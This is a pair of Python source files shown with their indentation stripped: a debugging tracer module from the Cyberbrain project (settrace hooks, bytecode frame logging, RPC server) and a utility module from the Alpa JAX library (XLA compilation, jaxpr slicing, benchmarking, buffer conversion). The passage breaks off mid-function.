tracer.py
|
"""Cyberbrain public API and tracer setup."""
import argparse
import dis
import functools
import os
import sys
from types import MethodType, FunctionType, FrameType
from typing import Optional, Union
from get_port import get_port
from . import logger, utils, rpc_server
from .frame import Frame
from .frame_tree import FrameTree
_debug_mode = False
# This allows using debug mode in both test and non-test code.
# The flag would conflict with the test runner's own arguments, so only parse it
# when not running a test.
if not utils.run_in_test():
parser = argparse.ArgumentParser()
parser.add_argument(
"--debug_mode",
dest="debug_mode",
action="store_true",
help="Whether to log more stuff for debugging.",
)
parser.set_defaults(debug_mode=False)
cb_args, _ = parser.parse_known_args()
_debug_mode = cb_args.debug_mode
class TracerFSM:
# States
INITIAL = 0
ACTIVE = 1
CALLED = 2
# Operations
START = 3
STOP = 4
mapping = {(INITIAL, START): ACTIVE, (ACTIVE, STOP): CALLED}
@classmethod
def next_state(cls, current_state, operation):
return cls.mapping[(current_state, operation)]
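# Illustrative sketch (added for clarity; the helper name below is hypothetical).
# TracerFSM only allows INITIAL --START--> ACTIVE --STOP--> CALLED; any other
# transition raises a KeyError from the mapping lookup.
def _tracer_fsm_example():
    assert TracerFSM.next_state(TracerFSM.INITIAL, TracerFSM.START) == TracerFSM.ACTIVE
    assert TracerFSM.next_state(TracerFSM.ACTIVE, TracerFSM.STOP) == TracerFSM.CALLED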
class Tracer:
debug_mode = _debug_mode
def __init__(self, debug_mode=None):
self.frame = None
self.raw_frame = None
self.decorated_function_code_id = None
self.frame_logger: Optional[logger.FrameLogger] = None
if debug_mode is not None:
self.debug_mode = debug_mode
self.tracer_state = TracerFSM.INITIAL
# For now the server lives inside Tracer. Later, when we need to trace multiple
# frames, it should be moved elsewhere.
self.server = rpc_server.Server()
if utils.run_in_test():
# Picks a random port for testing to allow concurrent test execution.
self.server.serve(port=get_port())
else:
self.server.serve()
def _initialize_frame_and_logger(
self, raw_frame: FrameType, initial_instr_pointer: int
):
self.tracer_state = TracerFSM.next_state(self.tracer_state, TracerFSM.START)
frame_name = (
# Use filename as frame name if code is run at module level.
os.path.basename(raw_frame.f_code.co_filename).rstrip(".py")
if raw_frame.f_code.co_name == "<module>"
else raw_frame.f_code.co_name
)
self.frame = Frame(
# For testing, only stores the basename so it's separator agnostic.
filename=utils.shorten_path(
raw_frame.f_code.co_filename, 1 if utils.run_in_test() else 3
),
frame_name=frame_name,
offset_to_lineno=utils.map_bytecode_offset_to_lineno(raw_frame),
)
FrameTree.add_frame(self.frame.frame_id, self.frame)
self.frame_logger = logger.FrameLogger(
instructions={
instr.offset: instr for instr in dis.get_instructions(raw_frame.f_code)
},
initial_instr_pointer=initial_instr_pointer,
frame=self.frame,
debug_mode=self.debug_mode,
)
def start(self, *, disabled=False):
"""Initializes tracing."""
# For now, we only allow triggering tracing once. This might change in the
# future.
if disabled or self.tracer_state != TracerFSM.INITIAL:
return
self.raw_frame = sys._getframe(1)
# tracer.init() contains the following instructions:
# 0 LOAD_FAST 0 (tracer)
# 2 LOAD_METHOD 0 (init)
# 4 CALL_METHOD 0
# 6 POP_TOP
# However, the logger is initialized before CALL_METHOD executes, so last_i is
# already at 4. That would leave the value stack without enough elements. We
# therefore move the instr_pointer back to LOAD_FAST and make sure LOAD_FAST and
# LOAD_METHOD are scanned, so that the value stack ends up in the correct state.
self._initialize_frame_and_logger(
self.raw_frame, initial_instr_pointer=self.raw_frame.f_lasti - 4
)
self.raw_frame.f_trace_opcodes = True
self.raw_frame.f_trace = self.local_tracer
sys.settrace(self.global_tracer)
def stop(self):
if not self.frame_logger or self.tracer_state == TracerFSM.CALLED:
# No frame_logger means start() did not run.
return
self.tracer_state = TracerFSM.next_state(self.tracer_state, TracerFSM.STOP)
sys.settrace(None)
# If self.raw_frame is set, tracer.start() was called explicitly;
# otherwise the @tracer decorator was used.
if self.raw_frame:
self.raw_frame.f_trace = None
del self.raw_frame
# Checks that the value stack is in the correct state: no extra elements are
# left on the stack. The two empty lists are the tracers, replaced with placeholders.
assert self.frame_logger.frame.value_stack.stack == [[], []]
else:
assert len(self.frame_logger.frame.value_stack.stack) == 0
# If run in production, let the server wait for termination.
if not utils.run_in_test():
self._wait_for_termination()
def _wait_for_termination(self):
"""
RPC server should keep running until explicitly terminated, but it should not
block the execution of user code. Thus we let it wait in a separate thread.
"""
from threading import Thread
Thread(target=self.server.wait_for_termination).start()
def __call__(self, disabled: Union[Union[FunctionType, MethodType], bool] = False):
"""Enables the tracer object to be used as a decorator.
Note that the decorator can take a `disabled` argument, or no argument:
@tracer(disabled=True)
def f():
or
@tracer
def f():
To achieve this, the `disabled` parameter can either be a boolean, or the
decorated function. To match the semantics, a better name for the parameter is
"function_or_disabled", but users being able to write `disabled=True` is a
must-have feature, therefore we have no choice but to name it "disabled".
This is ugly and I hope to find a way to change it. singledispatch[method] won't
work, because it does not take keyword arguments. TypeDispatch from fastcore
(https://fastcore.fast.ai/dispatch.html) is similar to singledispatch, but it's
not ideal either as it requires putting method implementation outside of class.
"""
def decorator(f, disabled_by_user=False):
@functools.wraps(f)
def wrapper(*args, **kwargs):
# TracerFSM.ACTIVE: we are inside a recursive call; the tracer was already
# activated in an outer frame.
# TracerFSM.CALLED: the function is being called again after tracing finished.
# In both cases, don't enable tracing.
if disabled_by_user or self.tracer_state in {
TracerFSM.ACTIVE,
TracerFSM.CALLED,
}:
return f(*args, **kwargs)
self.decorated_function_code_id = id(f.__code__)
sys.settrace(self.global_tracer)
result = f(*args, **kwargs)
self.stop()
return result
return wrapper
if type(disabled) == bool:
return functools.partial(decorator, disabled_by_user=disabled)
else:
decorated_function = disabled
return decorator(decorated_function)
@property
def events(self):
return self.frame_logger.frame.events
@property
def loops(self):
"""Test only. Provides access to logged events."""
return list(self.frame_logger.frame.loops.values())
def global_tracer(self, raw_frame, event, arg):
# Later when we need to trace more functions, we should identify those
# functions or at least use utils.should_exclude(frame) to avoid tracing
# unnecessary frames.
#
# self.tracer_state == TracerFSM.INITIAL is for preventing stepping into
# recursive calls, since their f_code are the same.
if (
event == "call"
and id(raw_frame.f_code) == self.decorated_function_code_id
and self.tracer_state == TracerFSM.INITIAL
):
raw_frame.f_trace_opcodes = True
self._initialize_frame_and_logger(raw_frame, initial_instr_pointer=0)
return self.local_tracer
def local_tracer(self, raw_frame, event, arg):
if utils.should_exclude(raw_frame):
return
if event == "opcode":
self.frame_logger.update(raw_frame)
if event == "return":
# print(raw_frame, event, arg, raw_frame.f_lasti)
self.frame.log_return_event(raw_frame, value=arg)
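# Illustrative usage sketch (added for clarity; the function below is hypothetical
# and not part of the original module). It shows the two decorator forms described
# in Tracer.__call__ plus the `events` accessor.
def _tracer_usage_example():
    tracer = Tracer(debug_mode=True)

    @tracer
    def traced(a, b):
        return a + b

    @tracer(disabled=True)
    def not_traced():
        return 0

    traced(1, 2)
    not_traced()
    return tracer.events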
|
util.py
|
# pylint: disable=consider-using-enumerate
"""Common utilities."""
import functools
import itertools as it
import os
import subprocess
import time
from collections import OrderedDict
from datetime import datetime
from functools import partial, partialmethod
import threading
from typing import Sequence, Any
from warnings import warn
import jax
import jax.numpy as jnp
from jax._src import dispatch
from jax._src.api import FLAGS, ShapeDtypeStruct
from jax._src.dlpack import from_dlpack, to_dlpack
from jax._src.lib import xla_bridge as xb, xla_client as xc, xla_extension as xe
from jax.api_util import shaped_abstractify
from jax.core import (Atom, ClosedJaxpr, DropVar, Jaxpr, JaxprEqn, Literal,
ShapedArray, Var)
from jax.experimental.maps import FrozenDict
from jax.interpreters import partial_eval as pe
from jax.interpreters import xla, pxla
from jax.interpreters.xla import _DeviceArray
from jax.tree_util import tree_map, tree_flatten, PyTreeDef
import numpy as np
import flax
from flax.training import train_state
import ray
import tqdm
import cupy as cp
from alpa.global_env import global_config, is_worker
########################################
##### Alpa API Utilities
########################################
def freeze_dict(pytree: PyTreeDef):
"""Convert a pytree to a FrozenDict."""
def is_leaf(x):
return isinstance(x, dict)
def freeze(x):
if isinstance(x, dict):
return FrozenDict(x)
return x
return tree_map(freeze, pytree, is_leaf=is_leaf)
def auto_static_argnums(args: Sequence[Any]):
"""Return the indices of static arguments according to heuristic rules."""
def is_static_arg(arg):
if isinstance(arg, (bool, int, float, str)):
return True
if isinstance(arg, (flax.optim.base.Optimizer, train_state.TrainState)):
return False
xs, _ = tree_flatten(arg)
for x in xs:
try:
x = shaped_abstractify(x)
except TypeError:
return True
return False
return tuple(i for i in range(len(args)) if is_static_arg(args[i]))
def auto_donate_argnums(args: Sequence[Any]):
"""Return the indices of donated arguments according to heuristic rules."""
def should_donate(x):
# Always donate optimizer
if isinstance(x, (flax.optim.base.Optimizer, train_state.TrainState)):
return True
return False
return tuple(i for i in range(len(args)) if should_donate(args[i]))
def abstractify_with_aval(x):
if isinstance(x, ShapedArray):
return x
elif isinstance(x, ShapeDtypeStruct):
return ShapedArray(x.shape, x.dtype, named_shape=x.named_shape)
else:
return xla.abstractify(x)
def tree_to_nparray(tree):
"""Convert a pytree to a pytree of numpy array."""
def convert_to_nparray(x):
if hasattr(x, "__array__"):
return np.asanyarray(x)
return x
return tree_map(convert_to_nparray, tree)
def update_jax_platform(platform):
"""Update the jax backend platform."""
jax.config.update("jax_platform_name", platform)
xb.get_backend.cache_clear()
########################################
##### Data Structure Utilities
########################################
def to_int_tuple(array: np.ndarray):
"""Convert a numpy array to int tuple."""
if array is None:
return tuple()
return tuple(int(x) for x in array)
def check_arithmetic_sequence(array: np.ndarray):
"""Check the input 1-D array is an arithmetic sequence. Return
the delta if Ture and None otherwise."""
if len(array) < 2:
return None
delta = array[1] - array[0]
for i in range(2, len(array)):
if array[i] - array[i - 1] != delta:
return None
return delta
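# Illustrative sketch (added; the helper name is hypothetical): the common
# difference is returned for an arithmetic sequence, None otherwise.
def _example_check_arithmetic_sequence():
    assert check_arithmetic_sequence(np.array([2, 4, 6, 8])) == 2
    assert check_arithmetic_sequence(np.array([1, 2, 4])) is None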
class OrderedSet:
"""An ordered set implemented by using the built-in OrderedDict."""
def __init__(self, iterable=()):
self.dict = OrderedDict()
for element in iterable:
self.dict[element] = None
def add(self, *args):
for x in args:
self.dict[x] = None
def update(self, other):
for x in other:
self.dict[x] = None
def union(self, other):
result = OrderedSet()
result.update(self)
result.update(other)
return result
def intersection_update(self, other):
to_be_removed = []
for x in self:
if x not in other:
to_be_removed.append(x)
for x in to_be_removed:
self.remove(x)
def intersection(self, other):
result = OrderedSet()
for x in self:
if x in other:
result.add(x)
return result
def discard(self, element):
if element in self:
del self.dict[element]
def remove(self, element):
if element not in self:
raise KeyError(element)
del self.dict[element]
def clear(self):
self.dict.clear()
def difference(self, other):
result = OrderedSet()
for x in self:
if x not in other:
result.add(x)
return result
def difference_update(self, other):
for x in other:
self.discard(x)
def symmetric_difference(self, other):
result = OrderedSet()
for x in self:
if x not in other:
result.add(x)
for x in other:
if x not in self:
result.add(x)
return result
def __iter__(self):
for x in self.dict:
yield x
def __len__(self):
return len(self.dict)
def __contains__(self, element):
return element in self.dict
def __repr__(self):
return "OrderedSet([" + ", ".join(repr(x) for x in self) + "])"
def __or__(self, other):
return self.union(other)
def __and__(self, other):
return self.intersection(other)
def __sub__(self, other):
return self.difference(other)
def __xor__(self, other):
return self.symmetric_difference(other)
def __ior__(self, other):
self.update(other)
return self
def __iand__(self, other):
self.intersection_update(other)
return self
def __isub__(self, other):
self.difference_update(other)
return self
def __eq__(self, other):
if isinstance(other, OrderedSet):
return self.dict == other.dict
return False
@classmethod
def __class_getitem__(cls, item):
return f"{cls.__name__}[{item.__name__}]"
class DisjointDict:
"""A dictionary for recursive lookup.
Path compression is used to avoid excess of maximum recursion depth."""
def __init__(self):
self.values = {}
def update(self, keys, values):
for key, value in zip(keys, values):
self.values[key] = value
def recursive_lookup(self, key):
lookup_queue = [key]
value = None
while len(lookup_queue) > 0:
k = lookup_queue.pop()
if value is not None:
self.values[k] = value
continue
if k not in self.values:
value = k
continue
lookup_queue.append(k)
lookup_queue.append(self.values[k])
return value
def keys(self):
return list(self.values.keys())
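# Illustrative usage sketch (added; the helper name is hypothetical). Lookups
# follow the chain of values until a key with no entry is found; path compression
# then points every visited key directly at that root.
def _example_disjoint_dict():
    d = DisjointDict()
    d.update(["a", "b"], ["b", "c"])  # a -> b -> c
    assert d.recursive_lookup("a") == "c"
    assert d.values["a"] == "c"  # compressed after the lookup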
def cached_property(fn, *args, **kwargs):
"""
Decorator to make a function a "cached property".
This means that it is a property whose return value is cached after the
first time it is called.
Args:
fn: The function to be made a cached property
*args: Any args for the function
**kwargs: Any kwargs for the function
Returns:
function
"""
return property(functools.lru_cache()(fn, *args, **kwargs))
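# Illustrative usage sketch (added; the class below is hypothetical). The wrapped
# method runs once per instance; later accesses return the cached value.
def _example_cached_property():
    class Counter:
        calls = 0

        @cached_property
        def value(self):
            Counter.calls += 1
            return 42

    c = Counter()
    assert c.value == 42 and c.value == 42
    assert Counter.calls == 1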
########################################
##### XLA API Utilities
########################################
def get_compile_options(num_replicas: int, num_partitions: int,
device_assignment: np.ndarray,
use_spmd_partitioning: bool,
parameter_is_tupled_arguments: bool,
build_random_seed: int):
"""Return CompileOptions for XLA compilation."""
compile_options = xb.get_compile_options(
num_replicas=num_replicas,
num_partitions=num_partitions,
device_assignment=device_assignment,
use_spmd_partitioning=use_spmd_partitioning,
)
compile_options.parameter_is_tupled_arguments = parameter_is_tupled_arguments
compile_options.executable_build_options.seed = build_random_seed
return compile_options
def jaxpr_to_hlo_computation(name: str, closed_jaxpr: ClosedJaxpr,
donated_invars: Sequence[bool], backend):
"""Convert a jaxpr to a XLA HLO computation.
Reference code: jax/jax/_src/dispatch.py::lower_xla_callable
"""
backend_name = backend.platform
in_avals = [var.aval for var in closed_jaxpr.jaxpr.invars]
consts = closed_jaxpr.consts
map(dispatch.prefetch,
it.chain(consts, dispatch.jaxpr_literals(closed_jaxpr.jaxpr)))
# Convert jaxpr to XLA HLO
tuple_args = False
axis_env = xla.AxisEnv(nreps=1, names=(), sizes=())
name_stack = xla.new_name_stack(xla.wrap_name(name, 'parallelize'))
c = xc.XlaBuilder(name)
xla_consts = xla._xla_consts(c, consts)
xla_args, donated_invars = xla._xla_callable_args(
c, in_avals, tuple_args, donated_invars=donated_invars)
ctx = xla.TranslationContext(c, backend_name, axis_env, name_stack)
out_nodes = xla.jaxpr_subcomp(ctx, closed_jaxpr.jaxpr, xla_consts,
*xla_args)
out_tuple = xc.ops.Tuple(c, out_nodes)
# Set up aliases (donating invars)
if donated_invars:
if backend.platform in ("gpu", "tpu"):
donation_results = xla.set_up_aliases(c, xla_args,
c.GetShape(out_tuple),
donated_invars, tuple_args)
if any(donation_results):
unused_donations = [
str(c.GetShape(a))
for a, d in zip(xla_args, donation_results)
if d
]
warn_msg = ", ".join(unused_donations)
warn(f"Some donated buffers were not usable: {warn_msg}")
return c.build(out_tuple)
def setup_computation_alias(xla_computation: xc.XlaComputation,
donated_invars: Sequence[bool]):
"""Set input/output alias in xla computation.
Assume the tensors in output tuple strictly match the donated parameters.
"""
program_shape = xla_computation.program_shape()
parameter_shapes = program_shape.parameter_shapes()
result_shapes = program_shape.result_shape().tuple_shapes()
assert len(parameter_shapes) == len(donated_invars), (
"Zhuohan: This error might be caused by an error in "
"XLA stage slicing.")
p_in = 0
p_out = 0
while p_in < len(parameter_shapes) and p_out < len(result_shapes):
if donated_invars[p_in]:
if parameter_shapes[p_in] == result_shapes[p_out]:
xla_computation.setup_alias((p_out,), p_in, ())
p_in += 1
p_out += 1
else:
p_out += 1
else:
p_in += 1
while p_in < len(parameter_shapes):
if donated_invars[p_in]:
warn("Some vars are not donated")
p_in += 1
def count_communication_primitives(hlo_ir: str,
ignore_scalar_all_reduce: bool = False):
"""Count the communication primitives in a HLO IR."""
total = hlo_ir.count("channel_id")
all_reduce = hlo_ir.count("all-reduce(") + hlo_ir.count("all-reduce-start(")
all_gather = hlo_ir.count("all-gather(") + hlo_ir.count("all-gather-start(")
reduce_scatter = hlo_ir.count("reduce-scatter(") + hlo_ir.count(
"reduce-scatter-start(")
all_to_all = hlo_ir.count("all-to-all(") + hlo_ir.count("all-to-all-start(")
if ignore_scalar_all_reduce:
# Ignore allreduce of scalar values
scalar_all_reduce = 0
scalar_all_reduce += hlo_ir.count("all-reduce(f32[]")
scalar_all_reduce += hlo_ir.count("all-reduce-start(f32[]")
scalar_all_reduce += hlo_ir.count("all-reduce(f16[]")
scalar_all_reduce += hlo_ir.count("all-reduce-start(f16[]")
total -= scalar_all_reduce
all_reduce -= scalar_all_reduce
return total, all_reduce, all_gather, reduce_scatter, all_to_all
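# Illustrative sketch (added; the HLO text below is fabricated and only meant to
# exercise the substring counting above).
def _example_count_communication_primitives():
    fake_hlo = (
        "%ar = f32[128] all-reduce(f32[128] %p0), channel_id=1\n"
        "%ag = f32[256] all-gather(f32[128] %p1), channel_id=2\n"
        "%sc = f32[] all-reduce(f32[] %p2), channel_id=3\n"
    )
    total, all_reduce, all_gather, _, _ = count_communication_primitives(fake_hlo)
    assert (total, all_reduce, all_gather) == (3, 2, 1)
    # Scalar all-reduces can be excluded from the counts.
    total, all_reduce, *_ = count_communication_primitives(
        fake_hlo, ignore_scalar_all_reduce=True)
    assert (total, all_reduce) == (2, 1)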
def compile_dummy_zero_constant(backend, num_devices: int):
"""Compile an XLA executable that returns a constant zero."""
c = xc.XlaBuilder("dummy_zero_constant")
sharding = xc.OpSharding()
sharding.type = sharding.type.REPLICATED
c.set_sharding(sharding)
zero = xc.ops.Constant(c, np.array(0, dtype=np.dtype(np.int32)))
c.clear_sharding()
c = c.build(xc.ops.Tuple(c, [zero]))
compile_options = xb.get_compile_options(
num_replicas=1,
num_partitions=num_devices,
device_assignment=np.arange(num_devices).reshape((1, -1)),
use_spmd_partitioning=True,
)
compiled = backend.compile(c, compile_options)
return compiled
def compile_allocate_zero_buffers(backend, num_devices: int,
shapes: Sequence[Sequence[int]],
dtypes: Sequence[jnp.dtype]):
"""Compile an XLA executable that returns zero buffers with given shape and dtypes."""
c = xc.XlaBuilder("allocate_zero_buffers")
sharding = xc.OpSharding()
sharding.type = sharding.type.REPLICATED
c.set_sharding(sharding)
ret = []
for shape, dtype in zip(shapes, dtypes):
zero = xc.ops.Constant(c, np.array(0, dtype=dtype))
zero = xc.ops.Broadcast(zero, shape)
ret.append(zero)
c.clear_sharding()
c = c.build(xc.ops.Tuple(c, ret))
compile_options = xb.get_compile_options(
num_replicas=1,
num_partitions=num_devices,
device_assignment=np.arange(num_devices).reshape((1, -1)),
use_spmd_partitioning=True,
)
compiled = backend.compile(c, compile_options)
return compiled
def compile_memset_zero_buffers(backend, num_devices: int,
shapes: Sequence[Sequence[int]],
dtypes: Sequence[jnp.dtype]):
"""
Compile an XLA executable that memset zero buffers with given shape and dtypes.
Try to avoid memcpy
"""
c = xc.XlaBuilder("allocate_zero_buffers")
args = []
sharding = xc.OpSharding()
sharding.type = sharding.type.REPLICATED
c.set_sharding(sharding)
for shape, dtype in zip(shapes, dtypes):
args.append(
xc.ops.Parameter(c, len(args),
xc.shape_from_pyval(np.ones(shape, dtype))))
sharding_tuple = xc.OpSharding()
sharding_tuple.type = sharding.type.TUPLE
sharding_tuple.tuple_shardings = [sharding for _ in shapes]
c.set_sharding(sharding_tuple)
input_params = xc.ops.Tuple(c, args)
c.set_sharding(sharding)
output_shape = xc.Shape.scalar_shape(np.dtype(np.float32))
output_tuple = xc.ops.CustomCall(c,
b'__builtin$MemZero',
operands=(input_params,),
shape=output_shape)
c = c.build(output_tuple)
compile_options = xb.get_compile_options(
num_replicas=1,
num_partitions=num_devices,
device_assignment=np.arange(num_devices).reshape((1, -1)),
use_spmd_partitioning=True,
)
compiled = backend.compile(c, compile_options)
return compiled
def compile_concatenate(backend, mesh_shape, sharding_spec, batch_size,
batch_dim, aval):
num_devices = np.prod(mesh_shape)
sharding = pxla.sharding_spec_sharding_proto(sharding_spec)
build_random_seed = global_config.build_random_seed
compile_options = get_compile_options(
num_replicas=1,
num_partitions=num_devices,
device_assignment=np.arange(num_devices).reshape((1, -1)),
use_spmd_partitioning=True,
parameter_is_tupled_arguments=False,
build_random_seed=build_random_seed)
c = xc.XlaBuilder("concatenate buffers")
c.set_sharding(sharding)
operands = []
for batch_idx in range(batch_size):
operands.append(
xc.ops.Parameter(
c, batch_idx,
xc.shape_from_pyval(np.ones(aval.shape, aval.dtype))))
concated = xc.ops.ConcatInDim(c, operands, batch_dim)
c = c.build(concated)
compiled = backend.compile(c, compile_options)
hlo_proto = compiled.hlo_modules()[0].as_serialized_hlo_module_proto()
return hlo_proto
def get_shard_shape(aval: ShapedArray, sharding_spec: pxla.ShardingSpec):
"""Return the shape of a shard."""
shape = []
for dim, spec_dim in zip(aval.shape, sharding_spec.sharding):
if isinstance(spec_dim, pxla.NoSharding):
shape.append(dim)
elif isinstance(spec_dim, pxla.Chunked):
shape.append(dim // np.prod(spec_dim.chunks))
elif isinstance(spec_dim, pxla.Unstacked):
shape.append(spec_dim.size)
return tuple(shape)
def get_microbatch_sharding_spec(spec: pxla.ShardingSpec, batch_dim,
num_micro_batch):
batch_dim_chunks = [num_micro_batch]
if isinstance(spec.sharding[batch_dim], pxla.Chunked):
batch_dim_chunks.extend(spec.sharding[batch_dim].chunks)
batch_dim_axis = 0
for sharding in spec.sharding[:batch_dim]:
if isinstance(sharding, pxla.Chunked):
batch_dim_axis += 1
new_sharding = list(spec.sharding)
new_sharding[batch_dim] = pxla.Chunked(batch_dim_chunks)
new_mapping = []
for mapping in spec.mesh_mapping:
if isinstance(mapping, pxla.Replicated):
new_mapping.append(mapping)
continue
assert isinstance(mapping, pxla.ShardedAxis)
new_axis = mapping.axis
if mapping.axis >= batch_dim_axis:
new_axis += 1
new_mapping.append(pxla.ShardedAxis(new_axis))
new_mapping.append(pxla.ShardedAxis(batch_dim_axis))
return pxla.ShardingSpec(sharding=tuple(new_sharding),
mesh_mapping=tuple(new_mapping))
class XlaPassContext:
"""A global context for passing arguments from python to XLA c++ passes."""
current = None
def __init__(self, value_dict):
self.value_dict = value_dict
def __enter__(self):
assert XlaPassContext.current is None, "Nested pass contexts are not supported"
XlaPassContext.current = self
xe.set_pass_context(self.value_dict)
def __exit__(self, exc_type, exc_value, exc_traceback):
XlaPassContext.current = None
xe.clear_pass_context()
########################################
##### Jaxpr Utilities
########################################
def clone_jaxpr(closed_jaxpr: ClosedJaxpr,
invars: Sequence[Atom] = None,
outvars: Sequence[Var] = None,
eqns: Sequence[JaxprEqn] = None,
constvars: Sequence[Var] = None,
consts: Sequence = None):
"""Clone a jaxpr and replace members if they are provided."""
constvars = constvars or closed_jaxpr.jaxpr.constvars
invars = invars or closed_jaxpr.jaxpr.invars
outvars = outvars or closed_jaxpr.jaxpr.outvars
eqns = eqns or closed_jaxpr.jaxpr.eqns
consts = consts or closed_jaxpr.consts
jaxpr = Jaxpr(constvars, invars, outvars, eqns)
return ClosedJaxpr(jaxpr, consts)
def trace_jaxpr_with_micro_batch(fun, batch_invars, num_micro_batches,
raw_avals):
"""Trace the jaxpr of the computation of a micro batch."""
avals = []
batch_size = None
for aval, is_batch_var in zip(raw_avals, batch_invars):
if is_batch_var:
assert aval.shape[0] % num_micro_batches == 0, (
"The batch dimension must be divisible by num_micro_batches.")
if batch_size is None:
batch_size = aval.shape[0] // num_micro_batches
else:
assert batch_size == aval.shape[0] // num_micro_batches, (
"The batch dimension must be the same for all batch vars.")
shape = (batch_size,) + aval.shape[1:]
avals.append(aval.update(shape=shape))
else:
avals.append(aval)
with jax.disable_jit():
jaxpr, _, consts = pe.trace_to_jaxpr_final(fun, avals)
closed_jaxpr = ClosedJaxpr(jaxpr, consts)
return closed_jaxpr, avals, batch_size
def slices_to_jaxpr(closed_jaxpr: ClosedJaxpr,
sliced_eqns) -> Sequence[ClosedJaxpr]:
"""Wrap sliced equations to a list of ClosedJaxpr."""
n_eqns = len(sliced_eqns)
global_invars = OrderedSet(closed_jaxpr.jaxpr.invars)
global_consts = dict(zip(closed_jaxpr.jaxpr.constvars, closed_jaxpr.consts))
global_outvars = OrderedSet(
var for var in closed_jaxpr.jaxpr.outvars if isinstance(var, Var))
result = []
layer_invars = [OrderedSet() for _ in range(n_eqns)]
layer_outvars = [OrderedSet() for _ in range(n_eqns)]
layer_consts = [{} for _ in range(n_eqns)]
var_layer_dict = {}
for i, eqns in enumerate(sliced_eqns):
for eqn in eqns:
for var in eqn.invars:
if isinstance(var, Literal):
continue
if var in global_consts:
layer_consts[i][var] = global_consts[var]
elif var in global_invars:
layer_invars[i].add(var)
elif var_layer_dict[var] != i:
layer_invars[i].add(var)
layer_outvars[var_layer_dict[var]].add(var)
else:
assert var_layer_dict[var] == i
for var in eqn.outvars:
if not isinstance(var, DropVar):
var_layer_dict[var] = i
if var in global_outvars:
layer_outvars[i].add(var)
for i, eqns in enumerate(sliced_eqns):
new_jaxpr = Jaxpr(list(layer_consts[i].keys()), list(layer_invars[i]),
list(layer_outvars[i]), eqns)
new_closed_jaxpr = ClosedJaxpr(new_jaxpr,
list(layer_consts[i].values()))
result.append(new_closed_jaxpr)
return result
def log_jaxpr(jaxpr: ClosedJaxpr, filename: str):
"""Print jaxpr int a temporary file for debugging purposes."""
path = "/tmp/" + filename
with open(path, "w", encoding="utf-8") as f:
f.write(str(jaxpr))
########################################
##### Profiling Utilities
########################################
def profile_xla_executable(compiled, backend, local_devices):
"""Measure the time costs of a xla executable with dummy inputs."""
hlo_module = compiled.hlo_modules()[0]
cost_failed = [np.inf] * 3
# Allocate dummy buffers
input_shapes = hlo_module.parameter_shapes()
# Prune OOM cases. This is not exact because memory used by third-party libraries is not considered.
free_mem = local_devices[0].available_memory()
input_bytes = 0
for shape in input_shapes:
input_bytes += np.prod(
shape.dimensions()) * shape.numpy_dtype().itemsize
if free_mem < compiled.total_allocation_size() and free_mem != -1:
return cost_failed
device_inputs = []
try:
for shape in input_shapes:
device_inputs.append([
backend.buffer_from_pyval(
np.empty(shape.dimensions(), shape.numpy_dtype()), device)
for device in local_devices
])
local_devices[0].synchronize_all_activity()
except RuntimeError:
return cost_failed
# Run benchmark
def run_func():
device_outputs = compiled.execute_sharded_on_local_devices(
device_inputs)
# Reset the value for donate buffers
ct = 0
for j in range(len(device_inputs)):
if device_inputs[j][0].is_deleted():
device_inputs[j] = device_outputs[ct]
ct += 1
local_devices[0].synchronize_all_activity()
try:
costs = benchmark_func(run_func, repeat=3, number=3)
except RuntimeError:
costs = cost_failed
return costs
def benchmark_func(run_func,
sync_func=None,
warmup=1,
repeat=3,
number=5,
min_repeat_second=None):
"""
Benchmark the execution time of a function.
The function is executed for (warmup + number * repeat) times.
The return value is a list of `repeat` elements, and each element is
the average execution time of `number` executions.
If `min_repeat_second` is set, the function automatically picks a `number`
so that one `repeat` lasts for at least `min_repeat_second` seconds.
"""
costs = []
# Warmup
for _ in range(warmup):
run_func()
# Choose a "number" according to "min_repeat_second"
if min_repeat_second:
if sync_func:
sync_func()
tic = time.time()
run_func()
if sync_func:
sync_func()
toc = time.time()
cost = toc - tic
number = max(int(min_repeat_second / cost), 1)
# Benchmark
for _ in range(repeat):
if sync_func:
sync_func()
tic = time.time()
for __ in range(number):
run_func()
if sync_func:
sync_func()
costs.append(time.time() - tic)
return np.array(costs) / number
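# Illustrative sketch (added; the helper name is hypothetical): a toy measurement
# of time.sleep. The returned array has `repeat` entries, each the mean time of
# `number` calls.
def _example_benchmark_func():
    costs = benchmark_func(lambda: time.sleep(0.001), warmup=1, repeat=2, number=5)
    assert len(costs) == 2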
########################################
##### Array conversion
########################################
def is_continuous_subset(tensor_slice, tensor_shape, row_major=True):
"""
Figure out whether a slice is a continuous subset of the tensor.
Args:
tensor_slice (Sequence[slice]): the slice taken from the tensor.
tensor_shape (Sequence[int]): the shape of the tensor.
row_major (bool): whether the tensor layout is row-major.
Returns:
is_continuous (bool)
"""
if not row_major:
raise NotImplementedError("Do not support column major.")
ndim = len(tensor_shape)
if len(tensor_slice) != ndim:
raise RuntimeError("ndims mismatch.")
slice_shape = tuple(ind.stop - ind.start for ind in tensor_slice)
for dim, dim_shape in enumerate(slice_shape):
if dim + 1 > ndim:
return True
if dim_shape == 1:
continue
return slice_shape[dim + 1:] == tensor_shape[dim + 1:]
def infer_offset_and_n_elements(tensor_slice):
"""Calculate the offset and #elements before making NCCL calls.
This function assumes the slice is a continuous subset of the original tensor.
"""
slice_shape = tuple(ind.stop - ind.start for ind in tensor_slice)
offset = tuple()
n_elements = np.prod(slice_shape)
for dim, dim_shape in enumerate(slice_shape):
offset = offset + (tensor_slice[dim].start,)
if dim_shape > 1:
break
return offset, n_elements
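# Illustrative sketch (added; the helper name is hypothetical). For a slice that
# is a continuous subset, the offset is truncated at the first dimension whose
# sliced extent is larger than one.
def _example_infer_offset_and_n_elements():
    tensor_slice = (slice(2, 3), slice(0, 4))
    assert is_continuous_subset(tensor_slice, (8, 4))
    offset, n_elements = infer_offset_and_n_elements(tensor_slice)
    assert offset == (2, 0) and n_elements == 4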
def xla_buffer_to_jax_tensor(xla_buf):
"""
Convert an xla buffer to a JAX DeviceArray
so that we can index into the data buffer.
"""
aval = ShapedArray(xla_buf.shape, xla_buf.dtype)
return _DeviceArray(aval, xla_buf.device(), xla_buf)
def jax_tensor_to_xla_buffer(jax_buf):
"""Convert a JAX Device array back to XLA buffer."""
return jax_buf.device_buffer
def xla_buffer_to_cupy(xla_buf, take_ownership=False):
"""Convert an xla buffer directly to cupy, w/o transitioning from jax buffer."""
return cp.fromDlpack(
xc._xla.buffer_to_dlpack_managed_tensor(xla_buf,
take_ownership=take_ownership))
def cupy_to_xla_buffer(tensor):
"""Convert cupy tensors to XLA buffers."""
if isinstance(tensor, list):
return list(map(cupy_to_xla_buffer, tensor))
cpu_backend = xb.get_backend("cpu")
try:
